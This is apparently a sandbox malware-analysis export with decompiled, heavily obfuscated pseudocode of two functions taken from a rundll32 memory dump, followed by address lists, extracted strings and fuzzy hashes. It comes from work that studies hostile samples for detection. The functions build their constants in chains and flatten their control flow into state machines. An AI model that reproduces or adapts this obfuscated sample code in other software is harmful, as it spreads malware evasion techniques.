				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E00256D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E0024F536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E0024F536(_v1644, _v1772, _v1612, _t508);
									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E00251773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
											_push(_t524);
											_push(_v1660);
											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E0024568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E002429E3( &_v524, 0x104, E0025889D(0x25c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E00252025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E00254F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E00248736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E0024C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E0024F536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E0025388A();
								_t479 = E00250ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E0024B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E002480BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E002488E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0x25c8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0x25ca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0x25ca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}

0x00244a3b
0x00244a46
0x00244a51
0x00244a5c
0x00244a64
0x00244a6c
0x00244a71
0x00244a79
0x00244a81
0x00244a8c
0x00244a94
0x00244a9f
0x00244aaa
0x00244ab2
0x00244abd
0x00244ad3
0x00244ada
0x00244ae3
0x00244aea
0x00244aef
0x00244af8
0x00244b03
0x00244b0b
0x00244b13
0x00244b1b
0x00244b23
0x00244b35
0x00244b3a
0x00244b43
0x00244b4e
0x00244b5a
0x00244b5d
0x00244b61
0x00244b69
0x00244b71
0x00244b79
0x00244b81
0x00244b85
0x00244b8d
0x00244b98
0x00244ba0
0x00244bab
0x00244bb6
0x00244bc1
0x00244bcc
0x00244bd4
0x00244bdc
0x00244be4
0x00244bec
0x00244bf4
0x00244bff
0x00244c0a
0x00244c15
0x00244c20
0x00244c28
0x00244c33
0x00244c3e
0x00244c49
0x00244c54
0x00244c67
0x00244c6e
0x00244c79
0x00244c81
0x00244c89
0x00244c8e
0x00244c98
0x00244ca8
0x00244cae
0x00244cb6
0x00244cbb
0x00244cc3
0x00244cce
0x00244cd9
0x00244ce4
0x00244cec
0x00244cf1
0x00244cf9
0x00244d01
0x00244d09
0x00244d14
0x00244d1f
0x00244d2a
0x00244d32
0x00244d37
0x00244d3f
0x00244d47
0x00244d4f
0x00244d57
0x00244d5f
0x00244d67
0x00244d6f
0x00244d77
0x00244d80
0x00244d85
0x00244d8b
0x00244d93
0x00244d9e
0x00244da9
0x00244db4
0x00244dbc
0x00244dc4
0x00244dc9
0x00244dd1
0x00244dd9
0x00244de5
0x00244de8
0x00244dec
0x00244df4
0x00244dfc
0x00244e04
0x00244e09
0x00244e0e
0x00244e16
0x00244e21
0x00244e29
0x00244e34
0x00244e3c
0x00244e44
0x00244e49
0x00244e51
0x00244e64
0x00244e6b
0x00244e76
0x00244e7e
0x00244e86
0x00244e8e
0x00244e96
0x00244e9e
0x00244ea6
0x00244eae
0x00244eb6
0x00244ec1
0x00244ecc
0x00244ed7
0x00244ee4
0x00244eef
0x00244efa
0x00244f02
0x00244f0a
0x00244f12
0x00244f1a
0x00244f22
0x00244f27
0x00244f2c
0x00244f34
0x00244f3c
0x00244f4a
0x00244f4f
0x00244f5a
0x00244f5b
0x00244f5f
0x00244f67
0x00244f72
0x00244f7d
0x00244f88
0x00244f93
0x00244f9e
0x00244fa9
0x00244fb4
0x00244fbf
0x00244fca
0x00244fd7
0x00244fdb
0x00244fe3
0x00244fe8
0x00244ff0
0x00244ffb
0x00245003
0x0024500e
0x00245019
0x00245021
0x0024502c
0x00245034
0x0024503c
0x00245044
0x00245049
0x00245051
0x00245059
0x00245063
0x00245067
0x0024506f
0x00245077
0x00245082
0x0024508d
0x00245098
0x002450a0
0x002450a5
0x002450ad
0x002450b5
0x002450c0
0x002450cb
0x002450d6
0x002450e1
0x002450ee
0x002450f2
0x002450fa
0x00245102
0x0024510a
0x00245118
0x00245121
0x00245125
0x0024512d
0x00245135
0x0024513d
0x00245142
0x00245155
0x0024515a
0x00245161
0x00245163
0x0024516a
0x0024516a
0x0024516a
0x0024516f
0x0024516f
0x0024516f
0x0024516f
0x00245175
0x00000000
0x00000000
0x0024517b
0x00000000
0x002454f8
0x00245187
0x00245193
0x002452e9
0x002452ef
0x002452f0
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x00245199
0x0024519f
0x002452ad
0x002452b8
0x002452bd
0x002452bf
0x002452c2
0x002452c9
0x002452ce
0x00000000
0x002451a5
0x002451ab
0x0024525c
0x0024525d
0x0024526d
0x0024526f
0x00245277
0x00245279
0x0024527d
0x00245284
0x00245285
0x0024528a
0x0024528d
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x002451b1
0x002451b3
0x002451e0
0x0024522f
0x00245234
0x0024524b
0x00245251
0x00245252
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x002451b5
0x002451bb
0x00000000
0x002451c1
0x002451d3
0x002451d8
0x002451d9
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x0024516a
0x002451bb
0x002451b3
0x002451ab
0x0024519f
0x002453b2
0x002453b2
0x002453b2
0x0024530c
0x00245310
0x00245311
0x00245316
0x00245319
0x0024531a
0x0024531c
0x00245322
0x00245323
0x00245342
0x0024534a
0x0024534f
0x00245352
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x0024516a
0x00000000
0x0024531c
0x0024535c
0x00245362
0x002454bd
0x002454c4
0x002454c9
0x00000000
0x00245368
0x00245368
0x0024536e
0x00245439
0x00245440
0x00245445
0x0024545c
0x00245490
0x00245495
0x0024549a
0x0024549c
0x00000000
0x00245374
0x00245374
0x0024537a
0x00245404
0x0024540c
0x00245414
0x00245415
0x00000000
0x0024537c
0x0024537c
0x00245382
0x002453c8
0x002453ce
0x002453d6
0x002453d8
0x002453d9
0x002453d9
0x002453df
0x002453df
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x00245384
0x00245384
0x0024538a
0x00245397
0x0024539a
0x0024539f
0x002453a2
0x00000000
0x002453a2
0x00000000
0x0024538a
0x00245382
0x0024537a
0x0024536e
0x00000000
0x002454ce
0x002454ce
0x002454ce
0x00000000
0x0024516f

Strings

U$, xrefs: 0024502C
P, xrefs: 00244A5C
>], xrefs: 00244CE4
-*, xrefs: 00244FB4
6T-, xrefs: 00244CD9
`+, xrefs: 00244B4E
e!, xrefs: 00245102
;x, xrefs: 00244D93
*X, xrefs: 00244B23
][, xrefs: 0024512D
h=, xrefs: 00244BAB
Kc, xrefs: 00245051
WM, xrefs: 00244B8D

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
API String ID: 0-2931794159
Opcode ID: ea925dc76893ccb5cb2c7e52d7c307a7d969efb92a54c02c09804a1f94241616
Instruction ID: ed611421706203c0d9668563cf6b4d05cf3a3f7edf2a60c58a221aecb1ff81b1
Opcode Fuzzy Hash: ea925dc76893ccb5cb2c7e52d7c307a7d969efb92a54c02c09804a1f94241616
Instruction Fuzzy Hash: 02322271518781CFE3B8CF25C54AA8BBBE1BBC4304F508A1DE5DA962A0D7B59819CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00248F78, Relevance: 15.4, Strings: 12, Instructions: 367
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00248F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E0024BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E00254F7D(_v552, _v580, _v540);
										E00254F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E00254F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E0024F536(_v624, _v632, _v648, _t444);
									}
									if(_t445 == 0x1b7bc3fb) {
										E0024F326();
										E0024F6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E002417AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0x25c910);
												_t378 = E002488E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E00254F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E0024568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E00254F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E00248736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0x25ca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0x25ca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}

0x00248f78
0x00248f7e
0x00248f86
0x00248f8e
0x00248f96
0x00248f9b
0x00248fa3
0x00248fab
0x00248fb3
0x00248fb8
0x00248fbd
0x00248fc5
0x00248fcd
0x00248fd5
0x00248fdd
0x00248fea
0x00248ff1
0x00248ff7
0x00248ffc
0x00249001
0x00249007
0x0024900f
0x00249017
0x0024901f
0x00249024
0x0024902c
0x00249039
0x0024903c
0x00249040
0x00249048
0x00249050
0x0024905b
0x00249066
0x00249071
0x0024907c
0x00249087
0x00249092
0x0024909a
0x002490a2
0x002490a7
0x002490af
0x002490b7
0x002490bf
0x002490c7
0x002490cf
0x002490df
0x002490e8
0x002490eb
0x002490ef
0x002490f4
0x002490fc
0x00249104
0x0024910f
0x00249113
0x0024911b
0x00249123
0x0024912b
0x00249133
0x00249138
0x00249140
0x00249148
0x00249156
0x0024915b
0x00249161
0x00249169
0x00249176
0x00249179
0x0024917d
0x0024918d
0x00249191
0x00249199
0x002491a1
0x002491a6
0x002491ae
0x002491b3
0x002491bb
0x002491c8
0x002491cb
0x002491cf
0x002491d7
0x002491df
0x002491ea
0x002491f5
0x00249200
0x0024920b
0x00249213
0x0024921e
0x00249226
0x00249233
0x00249237
0x0024923f
0x00249247
0x0024924c
0x00249251
0x00249259
0x00249264
0x0024926f
0x0024927a
0x00249285
0x0024928d
0x00249298
0x002492a3
0x002492ae
0x002492b9
0x002492c1
0x002492c9
0x002492d1
0x002492d9
0x002492e6
0x002492e7
0x002492eb
0x002492f3
0x002492fb
0x00249309
0x0024930d
0x00249315
0x0024931d
0x00249325
0x0024932d
0x00249332
0x0024933a
0x00249342
0x0024934a
0x00249352
0x0024935a
0x00249362
0x0024936a
0x00249378
0x00249379
0x00249380
0x00249387
0x0024938b
0x00249393
0x0024939b
0x002493a0
0x002493a8
0x002493b0
0x002493b8
0x002493c2
0x002493c6
0x002493ce
0x002493d6
0x002493db
0x002493e3
0x002493eb
0x002493f3
0x002493fe
0x00249402
0x0024940a
0x00249417
0x0024941b
0x00249423
0x0024942b
0x00249433
0x00249433
0x00249433
0x00249438
0x00249438
0x00249438
0x0024943d
0x0024943d
0x0024943d
0x0024943d
0x0024943f
0x00000000
0x00000000
0x00249445
0x0024955a
0x0024955b
0x0024957f
0x00249584
0x00249589
0x0024959d
0x002495b5
0x002495ba
0x002495bb
0x002495c2
0x002495c9
0x002495d0
0x002495d0
0x002495d6
0x002495d6
0x00249433
0x00249433
0x00249433
0x00000000
0x00249433
0x0024944b
0x00249451
0x00000000
0x002496c1
0x0024945d
0x0024952e
0x00249535
0x00249541
0x00249546
0x0024954b
0x00000000
0x00249463
0x00249469
0x002494d8
0x00249511
0x00000000
0x002494da
0x002494da
0x002494e5
0x002494e7
0x002494f4
0x002494f9
0x002494fe
0x00249506
0x00249433
0x00249433
0x00249433
0x00249438
0x00249438
0x00000000
0x00249438
0x00249433
0x0024946b
0x00249471
0x00000000
0x00249477
0x00249485
0x00249486
0x0024948d
0x00249495
0x0024949b
0x002494b0
0x002494c1
0x002494c7
0x002494c7
0x002494cc
0x00249438
0x00249438
0x00249438
0x00000000
0x00249438
0x0024949d
0x002494a4
0x002494a9
0x00000000
0x002494a9
0x0024949b
0x00249471
0x00249469
0x0024945d
0x002495ec
0x002495f2
0x002495fa
0x00000000
0x00249600
0x00249600
0x00249601
0x0024960e
0x0024960f
0x0024960f
0x0024961a
0x0024961b
0x00249626
0x00249628
0x0024962d
0x00249632
0x00000000
0x00249634
0x00249643
0x00249648
0x0024964d
0x00249654
0x00000000
0x00249654
0x00000000
0x00249632
0x002496cc
0x002496cc
0x002496cc
0x0024965d
0x00249669
0x0024966a
0x0024966d
0x0024966e
0x00249673
0x00249679
0x0024967b
0x00000000
0x0024967b
0x00000000
0x00249679
0x002495e6
0x00249685
0x00249688
0x0024968d
0x00249692
0x00249695
0x0024969a
0x00000000
0x0024969a
0x00000000
0x002496a0
0x002496a0
0x00000000
0x0024943d
0x00249438

Strings

Ml!, xrefs: 002494E7
b{, xrefs: 002492A3
~\, xrefs: 002491DF
-, xrefs: 00249342
]V, xrefs: 00249050
`H, xrefs: 002492FB
s5, xrefs: 0024921E
G1, xrefs: 00249362
}a, xrefs: 00249325
fpMl!, xrefs: 0024960F
@C, xrefs: 002492D9
#, xrefs: 002493CE

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
